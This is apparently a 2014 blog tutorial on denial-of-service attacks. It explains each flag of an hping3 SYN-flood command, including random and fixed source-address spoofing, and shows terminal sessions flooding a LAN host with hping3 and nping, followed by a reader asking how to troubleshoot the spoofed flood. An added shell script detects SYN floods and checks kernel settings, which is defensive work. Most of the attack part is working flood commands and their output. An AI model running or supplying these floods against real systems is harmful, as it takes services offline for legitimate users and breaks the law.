Sunday, November 16, 2014

Denial-of-service Attack – DOS using hping3 with spoofed IP in Linux



In computing, a denial-of-service (DoS) or distributed denial-of-service (DDoS) attack is an attempt to make a machine or network resource unavailable to its intended users.
Although the means to carry out, the motives for, and targets of a DoS attack vary, it generally consists of efforts to temporarily or indefinitely interrupt or suspend services of a host connected to the Internet.
To be clear: a distributed denial-of-service attack comes from many machines at once (two or more people, or, more typically, a botnet), while a plain denial-of-service attack comes from a single person or system. As of 2014, the frequency of recognized DDoS attacks had reached an average rate of 28 per hour.
Perpetrators of DoS attacks typically target sites or services hosted on high-profile web servers such as banks, credit card payment gateways, and even root nameservers.
Denial-of-service threats are also common in business, and are sometimes responsible for website attacks.

This technique has also seen extensive use around online games, by server owners or disgruntled competitors, for example against popular Minecraft servers. Increasingly, DoS attacks have also been used as a form of protest; Richard Stallman has described DoS as a form of ‘Internet Street Protests’. The term is generally used in relation to computer networks, but is not limited to that field; it is also used, for example, in reference to CPU resource management.
One common method of attack saturates the target machine with external communication requests, so many that it cannot respond to legitimate traffic, or responds so slowly that it is effectively unavailable. Such attacks usually overload the server. In general terms, DoS attacks are implemented by forcing the targeted computer(s) to reset, by consuming their resources so that they can no longer provide their intended service, or by obstructing the communication media between the intended users and the victim so that they can no longer communicate adequately.
Denial-of-service attacks are considered violations of the Internet Architecture Board’s Internet proper use policy, and also violate the acceptable use policies of virtually all Internet service providers. They also commonly constitute violations of the laws of individual nations.
I recently published another post that shows a DoS attack map in real time. So if you have a good connection and enough bandwidth, hey, you might even see your own attack on that map.
What’s hping3?
hping3 is a free packet generator and analyzer for the TCP/IP protocol. Hping is one of the de-facto tools for security auditing and testing of firewalls and networks, and was used to exploit the Idle Scan scanning technique now implemented in the Nmap port scanner. The new version of hping, hping3, is scriptable using the Tcl language and implements an engine for string based, human readable description of TCP/IP packets, so that the programmer can write scripts related to low level TCP/IP packet manipulation and analysis in a very short time.
Like most tools used in computer security, hping3 is useful to security experts, but it also has many applications in network testing and system administration.
Let me explain the options used in this command (assembled from the list below, in order: hping3 -c 100000 -d 120 -S -w 64 -p 21 --flood --rand-source www.hping3testsite.com):
  1. hping3 = the application binary.
  2. -c 100000 = number of packets to send.
  3. -d 120 = size of the data payload in each packet (120 bytes on top of the headers).
  4. -S = set only the SYN flag, so every packet looks like the first step of a TCP handshake.
  5. -w 64 = TCP window size advertised in each packet.
  6. -p 21 = destination port (21 is FTP). You can use any port here; a port that is actually listening is the realistic case, because the target then has to keep half-open connection state for every SYN it receives (a closed port just answers with a RST).
  7. --flood = send packets as fast as possible, without waiting for or showing replies (flood mode).
  8. --rand-source = use a random source IP address for every packet. You can instead use -a or --spoof <address> to send everything from one fixed, forged source address. See the man page.
  9. www.hping3testsite.com = target IP address or hostname. In my case it resolves to 127.0.0.1 (an entry in /etc/hosts).
So how do you know it’s working? In hping3 flood mode no replies are checked (and with --rand-source you could not check them anyway: the source address on every packet is a random one, so the target’s SYN-ACKs go to those random addresses instead of back to you).
It took me just 5 minutes to make this machine completely unresponsive (which is the definition of DoS, denial of service).
In short, if this machine were a web server, it would no longer be able to accept new connections, and even if it could, it would be really, really slow.
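What the flood looks like from the target’s side, as an added example that is not part of the original post. The helpers below parse the list of half-open connections that Linux iproute2 prints for `ss -Htan state syn-recv` (the -H flag, which suppresses the header, is assumed to exist in your iproute2; a header line is ignored anyway), count them overall, per local port and per peer address, and read the sysctls that govern how the kernel copes with a SYN flood. The sample listing, its addresses and the threshold of 256 are constructed assumptions, not data from the page.

```shell
#!/bin/sh
# Added example (not code from the original post): defender-side check for a
# SYN flood. Input is the output of `ss -Htan state syn-recv` (Linux iproute2),
# one half-open connection per line:
#   Recv-Q Send-Q Local-Address:Port Peer-Address:Port
# A constructed sample is embedded so the helpers can run offline; the
# addresses in it are made up.

SAMPLE_SS='0      0      192.168.0.106:21   10.44.17.9:5123
0      0      192.168.0.106:21   203.0.113.77:44012
0      0      192.168.0.106:21   198.51.100.4:2044
0      0      192.168.0.106:21   172.16.99.3:61212
0      0      192.168.0.106:21   10.9.8.7:1025
0      0      192.168.0.106:80   192.168.0.50:51344'

# Total number of half-open (SYN_RECV) sockets in a listing. Only lines whose
# first field is a number count, so a header line from an older ss is ignored.
count_syn_recv() {
    printf '%s\n' "$1" | awk '$1 ~ /^[0-9]+$/ { n++ } END { print n + 0 }'
}

# Number of distinct peer addresses. Under --rand-source every SYN carries a
# different forged source, so this tracks the SYN count itself and per-source
# rate limiting or blocking cannot help; only the total matters.
distinct_sources() {
    printf '%s\n' "$1" \
        | awk '$1 ~ /^[0-9]+$/ { sub(/:[0-9]+$/, "", $4); print $4 }' \
        | sort -u | awk 'END { print NR }'
}

# Half-open sockets on one local port (the -p target of the flood). The port is
# taken as the last colon-separated component, so IPv6 listings work too.
syn_recv_on_port() {
    printf '%s\n' "$1" | awk -v port="$2" \
        '$1 ~ /^[0-9]+$/ { n = split($3, a, ":"); if (a[n] == port) c++ } END { print c + 0 }'
}

# Live check on the current host: returns 1 when the number of half-open
# sockets exceeds the threshold (default 256, an arbitrary assumption),
# 2 if ss is unavailable.
check_live() {
    threshold="${1:-256}"
    listing="$(ss -Htan state syn-recv 2>/dev/null)" || return 2
    n="$(count_syn_recv "$listing")"
    if [ "$n" -gt "$threshold" ]; then
        echo "possible SYN flood: $n half-open sockets from $(distinct_sources "$listing") distinct sources"
        return 1
    fi
    echo "ok: $n half-open sockets"
}

# Kernel knobs that decide how the host survives a flood: with SYN cookies the
# backlog cannot be exhausted; a larger backlog and fewer SYN-ACK retries
# shorten how long each forged SYN ties up state.
show_syn_sysctls() {
    for k in net.ipv4.tcp_syncookies net.ipv4.tcp_max_syn_backlog net.ipv4.tcp_synack_retries; do
        printf '%s = %s\n' "$k" "$(sysctl -n "$k" 2>/dev/null || echo unavailable)"
    done
}

# Offline demonstration on the constructed sample.
echo "half-open sockets: $(count_syn_recv "$SAMPLE_SS")"
echo "distinct sources:  $(distinct_sources "$SAMPLE_SS")"
echo "on port 21:        $(syn_recv_on_port "$SAMPLE_SS" 21)"
```

On a box actually under the flood from the first example, run `check_live` and `show_syn_sysctls`; the telltale pattern of a --rand-source flood is that the distinct-source count is as large as the SYN_RECV count, which is why the fix is SYN cookies (net.ipv4.tcp_syncookies = 1) or upstream filtering rather than blocking individual addresses.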

Simple SYN flood – DOS using HPING3

root@VHacker:~# hping3 -S --flood -V 192.168.0.106
using eth0, addr: 192.168.0.102, MTU: 1500
HPING 192.168.0.106 (eth0 192.168.0.106): S set, 40 headers + 0 data bytes
hping in flood mode, no replies will be shown
^C
--- 192.168.0.106 hping statistic ---
3041715 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
root@VHacker:~# 

Simple SYN flood with spoofed IP – DOS using HPING3

root@VHacker:~# hping3 -S -P -U --flood -V --rand-source 192.168.0.106
using eth0, addr: 192.168.0.102, MTU: 1500
HPING 192.168.0.106 (eth0 192.168.0.106): SPU set, 40 headers + 0 data bytes
hping in flood mode, no replies will be shown
^C
--- 192.168.0.106 hping statistic ---
7215481 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
root@VHacker:~# 

TCP connect flood – DOS using NPING

root@VHacker:~# nping --tcp-connect -rate=90000 -c 900000 -q 192.168.0.106
 
Starting Nping 0.6.47 ( http://nmap.org/nping ) at 2014-11-16 18:27 IST
Max rtt: N/A | Min rtt: N/A | Avg rtt: N/A
TCP connection attempts: 900000 | Successful connections: 0 | Failed: 900000 (100.00%)
Nping done: 1 IP address pinged in 12.96 seconds
root@VHacker:~# 

1 comment:

  1. When I attack one server of mine and monitor the resources with htop it works as desired, but when I add the spoofing stage the resources stop being used. Do you know why? Thank you.
